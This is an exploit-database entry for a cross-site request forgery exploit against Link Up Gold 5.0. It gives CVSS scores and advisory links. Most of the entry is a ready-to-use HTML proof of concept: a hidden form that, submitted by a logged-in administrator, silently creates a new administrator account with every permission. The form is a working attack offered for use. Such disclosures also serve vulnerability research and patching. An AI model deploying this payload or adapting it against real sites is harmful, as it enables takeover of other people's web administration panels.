Link Up Gold 5.0 - CSRF Create Administrator Account

2009-12-18 / 2009-12-19
Credit: bi0
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

view source print? ______ __ ______ /\ == \ /\ \ /\ __ \ \ \ __< \ \ \ \ \ \/\ \ \ \_____\ \ \_\ \ \_____\ \/_____/ \/_/ \/_____/ 01000010 01101001 01001111 [#]----------------------------------------------------------------[#] # # [+] Link Up Gold - [ CSRF ] Create Administrator Account # # // Author Info # [x] Author: bi0 # [x] Contact: bukibv@hotmail.com # [x] Homepage : www.ssteam.ws # [x] Thanks: sp1r1t,packetdeath,Zer0flag,redking and ssteam.ws ... # [#]-------------------------------------------------------------------------------------------[#] # # [x] Exploit : # # [ CSRF ] # # [ Login ] # http://localhost/[path]/administration/index.php # # // Start CSRF |-------------------------------------------------------------------------------| <html> <body> <form action="http://[server]/[path]/administration/administrators.php" method="POST"> <input type="hidden" name="action" value="admin_created"> <!-- chose username --> <input name="username" value="admintest" maxlength=15 <!-- chose password --> <input name="password" value="admintest" maxlength=15> <!-- chose email --> <input name="email" value="admintest@lol.com" maxlength="255"> <!-- chose name --> <input name="name" value="admintest" maxlength="255"> <input type="hidden" name="rights[]" value="links" CHECKED> <input type="hidden" name="rights[]" value="all_links" CHECKED> <input type="hidden" name="rights[]" value="categories_links" CHECKED> <input type="hidden" name="rights[]" value="articles" CHECKED> <input type="hidden" name="rights[]" value="all_articles" CHECKED> <input type="hidden" name="rights[]" value="categories_articles" CHECKED> <input type="hidden" name="rights[]" value="email_owners" CHECKED> <input type="hidden" name="rights[]" value="blacklist" CHECKED> <input type="hidden" name="rights[]" value="polls" CHECKED> <input type="hidden" name="rights[]" value="users" CHECKED> <input type="hidden" name="rights[]" value="email_users" CHECKED> <input type="hidden" name="rights[]" value="newsletter" CHECKED> <input type="hidden" name="rights[]" value="board" CHECKED> <input type="hidden" name="rights[]" value="search_log" CHECKED> <input type="hidden" name="rights[]" value="ads" CHECKED> <input type="hidden" name="rights[]" value="adlinks" CHECKED> <input type="hidden" name="rights[]" value="news" CHECKED> <input type="hidden" name="rights[]" value="messages" CHECKED> <input type="hidden" name="rights[]" value="templates" CHECKED> <input type="hidden" name="rights[]" value="adv_prices_orders" CHECKED> <input type="hidden" name="rights[]" value="admins" CHECKED> <input type="hidden" name="rights[]" value="database_tools" CHECKED> <input type="hidden" name="rights[]" value="configuration"CHECKED> <input type="hidden" name="rights[]" value="reset_rebuild" CHECKED> <input type="submit" name="submit" value="Submit"> </form> </body> </html> |-------------------------------------------------------------------------------| # // End of attack # [#]------------------------------------------------------------------------------------------[#] #EOF

References:

http://xforce.iss.net/xforce/xfdb/54759
http://www.vupen.com/english/advisories/2009/3532
http://www.exploit-db.com/exploits/10436
http://secunia.com/advisories/37712
http://packetstormsecurity.org/0912-exploits/linkupgold-xsrf.txt
http://osvdb.org/61017


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top